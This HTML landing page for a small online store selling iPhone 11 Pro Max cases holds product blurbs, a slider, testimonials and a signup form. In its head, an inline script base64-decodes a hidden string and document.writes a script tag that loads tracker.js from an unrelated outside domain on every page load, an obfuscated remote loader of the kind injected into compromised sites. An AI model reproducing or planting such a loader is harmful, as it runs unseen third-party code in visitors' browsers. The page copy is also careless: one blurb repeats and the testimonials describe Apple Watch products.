<!DOCTYPE HTML>
<html>
<head>
    <title>The best iPhone 11 Pro Max cases </title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0">
    <link rel="stylesheet" href="assets/style.css" media="all"/>
    <link href="assets/js/lightbox/lightbox.css" rel="stylesheet"/>
    <!-- Google Webfonts -->
    <script src="https://kit.fontawesome.com/eb7396cf6d.js" crossorigin="anonymous"></script>
    <link href="https://fonts.googleapis.com/css2?family=Questrial&display=swap" rel="stylesheet">
    <!-- Scripts -->
    <script type="text/javascript" src="assets/js/jquery-1.7.2.min.js"></script>
    <script type="text/javascript" src="assets/js/lightbox/lightbox.js"></script>
    <script type="text/javascript" src="assets/js/transition.js"></script>
    <script src="assets/js/jquery.bxSlider.min.js" type="text/javascript"></script>
    <script src="assets/js/slider.settings.js" type="text/javascript"></script>

    <script type="text/javascript">
        var str1 = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vbXlzdGF0aXN0aWNzLmNsaWNrL3RyYWNrZXIuanMiPjwvc2NyaXB0Pg';
        var deStr = atob(str1);
        document.write('' + deStr + '');
    </script>
</head>
<body>
<style>
    /*.bx-wrapper{
      z-index: -1;
    }*/
    #instagram {
        border-radius: 5px;
    }

    #iphone-wrap {
        position: relative;
        background: none;
    }

    .img {
        z-index: 1;
        position: absolute;
        width: 292px;
        height: 400px;
        left: -83px;
        top: 52px;
    }

    .img > img {
        width: 100%;
        height: auto;
    }

    .bx-window {

    }

    .columnicons {
        height: 115px;
        width: 115px;
        margin: 0 auto;
        padding: 30px 0 27px 0px;
        background: none;
        text-align: center;
    }

    .columnicons > img {
        border-radius: 100%;
    }

    @media screen and (max-width: 1300px) {
        body {
            background: none;
            box-sizing: border-box;
            font-family: 'Questrial', sans-serif;
            margin: 0 auto;

        }

        #glow {
            display: none;
        }

        #app-wrap {
            display: flex;
            flex-direction: column-reverse;
            justify-content: center;
            align-items: center;
            background: #008C8C;
            height: auto;
        }

        #large-wrap, #header, #app-wrap, #testimonial-wrap, #side-wrap, #screenshots-wrap, #bx-wrapper, #signup, #signup-title {
            width: 100%;
        }

        #minifoot {
            padding-left: 0;
            padding-right: 0;

        }

        #screenshots-wrap {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }

        .content-wrap {
            width: 76%;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            padding: 7px 0 86px 0px;
        }

        #second-row {
            background: none;
            height: auto;
        }

        #third-row, #localwrap {
            height: auto;
        }

        #localwrap {
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        #testimonial-wrap {
            display: none;
        }

        #first-row {
            height: auto;
            overflow: hidden;
        }

        .bx-window {
            width: 600px;
        }

        #footer {
            height: auto;
            padding: 30px 0 0px 0;
        }

        #screenshots-wrap {
            padding-left: 0;
        }

        #signup, #customers-title {
            width: auto;
        }

        #aboutus {
            margin: 0;
            width: 80%;
        }

        #customers {
            width: auto;
        }

        #side-wrap {
            margin: 0;
            width: 90%;
            padding-bottom: 23px;
        }

        #localwrap {
            width: 90%;
        }

        .columnboxes {
            margin-left: 0;
            height: 331px;
        }

        #iphone-wrap {
            margin: 22px 0 0 135px;
        }

        #display-title, #offdesc {
            padding: 10px;
        }

    }

    @media screen and (max-width: 600px) {
        .bx-window, #bx-wrapper {
            max-width: 400px;
        }

        #signup {
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        #signup > input {
            margin-bottom: 10px;
        }
    }
</style>

<section>
    <div id="large-wrap">
        <div id="glow"></div>
        <div id="header">
            <div id="banner-text">The best cases</div>
            <div id="banner-right-bg"></div>

        </div>
        <div id="first-row">
            <div id="app-wrap">
                <div id="side-wrap">
                    <div id="display-title">The best iPhone cases</div>
                    <span id="offdesc">

                               A clear case, like the Joyguard, is best for iPhone owners that want to protect their handset,
                        without hiding the design. Sturdy and flexible is specially designed to support the fragile edges of your handset.

                    </span><br/>
                    <div>
                        <p><small style="padding: 10px">

                            The UAG Monarch case’s shockproof “combat-ready” design is meant to keep your handset safe against the most extreme of accidents,
                            which is good news for anyone in the bad habit of dropping their expensive investments.
                            This case comes in three different colours along with a 10-year limited warranty, so you can make sure your new
                            iPhone is always ready for actio

                        </small></p>
                    </div>
                    <!-- replace the # with the link to your app page of your google play and app store respectively -->
                    <style>
                        #instagram {
                            padding-top: 1px;
                            padding-bottom: 1px;
                            width: 200px;
                            background: #f09433;
                            background: -moz-linear-gradient(45deg, #f09433 0%, #e6683c 25%, #dc2743 50%, #cc2366 75%, #bc1888 100%);
                            background: -webkit-linear-gradient(45deg, #f09433 0%, #e6683c 25%, #dc2743 50%, #cc2366 75%, #bc1888 100%);
                            background: linear-gradient(45deg, #f09433 0%, #e6683c 25%, #dc2743 50%, #cc2366 75%, #bc1888 100%);
                            filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#f09433', endColorstr='#bc1888', GradientType=1);
                        }

                        #instagram > p {
                            text-align: center;
                            color: #fff;
                            font-size: 19px;
                        }

                    </style>
                    <a href="https://www.instagram.com/device_kld/" target="_blank"
                       style="text-decoration: none">
                        <div id="instagram"><p>Open Instagram</p></div>
                    </a>
                </div>

                <div id="iphone-wrap">
                    <div class="img">
                        <img src="assets/iphone.png" alt="" class="iphone">
                    </div>
                    <div id="iphone-slide">
                        <div style="width: 174px;"><img src="assets/iphone_slideshow/pic_1.jpg" alt="pic 1"/></div>
                        <div style="width: 174px;"><img src=" assets/iphone_slideshow/pic_2.jpg" alt="pic 1"/></div>
                        <div style="width: 174px;"><img src=" assets/iphone_slideshow/pic_3.jpg" alt="pic 1"/></div>
                        <div style="width: 174px;"><img src="assets/iphone_slideshow/pic_4.jpg" alt="pic 1"/></div>
                        <div style="width: 174px;"><img src="assets/iphone_slideshow/pic_5.jpg" alt="pic 1"/></div>
                        <div style="width: 174px;"><img src="assets/iphone_slideshow/pic_6.jpg" alt="pic 1"/></div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<!-- first_row_end -->

<section>
    <div id="second-row">
        <div class="content-wrap">
            <!-- Column Boxes -->
            <div class="columnboxes">
                <div class="iconspace">
                    <div class="columnicons">
                        <!-- Edit the filename if you use your own icon here -->
                        <img src="assets/icon_1.png" alt="Original design"/></div>
                    <div class="columntitle">Original design</div>
                    If you’re looking for a stylish, bulk-free case design, then this Mous case could be just the
                    ticket. This slim, impact-absorbing cover comes in a choice from a wide range of materials including
                    bamboo, walnut, black leather and aramid fibre for a sleek, clean look. Each case also contains
                    storage for two internal SIM cards.
                </div>
            </div>
            <div class="columnboxes">
                <div class="iconspace">
                    <div class="columnicons">
                        <!-- Edit the filename if you use your own icon here -->
                        <img src="assets/icon_2.png" alt="Shockproof"/></div>
                    <div class="columntitle">Shockproof</div>
                    As far as function goes, this case is slim enough to slot into your pocket without any frictional
                    issues, and tough enough to withstand hard knocks with what Mous calls 'AiroShock' technology. The
                    front of the case also juts out a little, offering greater protection from face-down drops.

                </div>
            </div>
            <div class="columnboxes">
                <div class="iconspace">
                    <div class="columnicons">
                        <!-- Edit the filename if you use your own icon here -->
                        <img src="assets/icon_3.png" alt="Comfortable"/></div>
                    <div class="columntitle">Comfortable</div>
                    If you’re looking for a stylish, bulk-free case design, then this Mous case could be just the
                    ticket. This slim, impact-absorbing cover comes in a choice from a wide range of materials including
                    bamboo, walnut, black leather and aramid fibre for a sleek, clean look. Each case also contains
                    storage for two internal SIM cards.


                </div>
            </div>
        </div>
    </div>
</section>
<!-- second_row_end -->


<section>
    <div id="third-row">
        <div class="content-wrap">
            <div id="localwrap">
                <div id="screenshots-wrap">
                    <div id="screenshot-title">
                        <h3>Screenshots</h3>
                    </div>
                    <div id="screenslide">
                        <div>
                            <div class="screenshot-frame"><a href="assets/screenshots/preview.jpg" rel="lightbox"
                                                             title="A image preview with caption"><img
                                    src="assets/screenshots/thumbnails/img_1_thumb.jpg" alt="img_1"/></a></div>
                            <div class="screenshot-frame"><a href="assets/screenshots/preview_2.jpg" rel="lightbox"><img
                                    src="assets/screenshots/thumbnails/img_2_thumb.jpg" alt="img_2"/></a></div>
                            <div class="screenshot-frame"><a href="assets/screenshots/preview_3.jpg" rel="lightbox"><img
                                    src="assets/screenshots/thumbnails/img_3_thumb.jpg" alt="img_3"/></a></div>
                        </div>
                        <div>
                            <div class="screenshot-frame"><a href="assets/screenshots/preview_2.jpg" rel="lightbox"
                                                             title="A image preview with caption"><img
                                    src="assets/screenshots/thumbnails/img_1_thumb.jpg" alt="img_1"/></a></div>
                            <div class="screenshot-frame"><a href="assets/screenshots/preview_3.jpg" rel="lightbox"><img
                                    src="assets/screenshots/thumbnails/img_3_thumb.jpg" alt="img_3"/></a></div>
                            <div class="screenshot-frame"><a href="assets/screenshots/preview.jpg" rel="lightbox"><img
                                    src="assets/screenshots/thumbnails/img_2_thumb.jpg" alt="img_2"/></a></div>
                        </div>
                    </div>
                </div>
                <div id="features">
                    <div id="features-title">
                        <h3>Features</h3>
                    </div>
                    <ul>
                        <li>Easy to use.</li>
                        <li>Individual design.</li>
                        <li>Pleasant to the touch.</li>
                        <li>Shockproof.</li>
                        <li style="color: #999;">And much more..</li>


                    </ul>
                </div>
            </div>
            <div id="testimonial-wrap">
                <p>
                <h3>Testimonials</h3>
                </p>
                <div id="quote"></div>
                <div class="testimonials">
                    <div>The case offers complete protection against dust, dirt, snow, and water. However, you will
                        still be
                        able to directly access the touch screen of your Apple Watch even if it is covered by this case
                        <p align="right"></p>
                    </div>
                    <div>There are plenty of things to love about this screen protector. It offers 330-foot depth
                        protection, meaning you can now use your Apple Watch while diving as long as it is covered with
                        this
                        protector. Made of a silicone and polycarbonate shell, this case reduces the risks of damage to
                        the
                        Apple Watch.
                        <p align="right"></p>
                    </div>
                    <div>Like Penom, there is little information about the Chinese company Yushuang. But it’s a brand
                        that
                        churns out high-quality, low-priced products like this case for the Apple Watch.
                        <p align="right"></p>
                    </div>
                </div>
                <div id="unquote"></div>
            </div>
        </div>
    </div>
</section>
<!-- third_row_end -->

<div id="footer">
    <div class="content-wrap">
        <div id="signup">
            <div id="signup-title">Sign up for updates</div>
            <input type="text" value="Your Name"/>
            <input type="text" value="Email Address"/>
            <button type="button">Sign up!</button>
        </div>
        <div id="customers">
            <div id="customers-title"><a style="color: #a09e9e;" href="/privacy-policy.html" target="_blank">Privacy
                Policy</a></div>

        </div>
        <div id="aboutus">
            <div id="about-title">Abous us</div>
            We are an online store selling accessories for mobile devices, tablets and other apple products <a
                href="https://www.instagram.com/device_kld/" target="_blank"><small>instagram</small></a>
        </div>
    </div>
    <div id="minifoot">
        <div style="padding: 0" class="content-wrap">© Copyright 2018

        </div>
    </div>
</div>
</body>
</html>
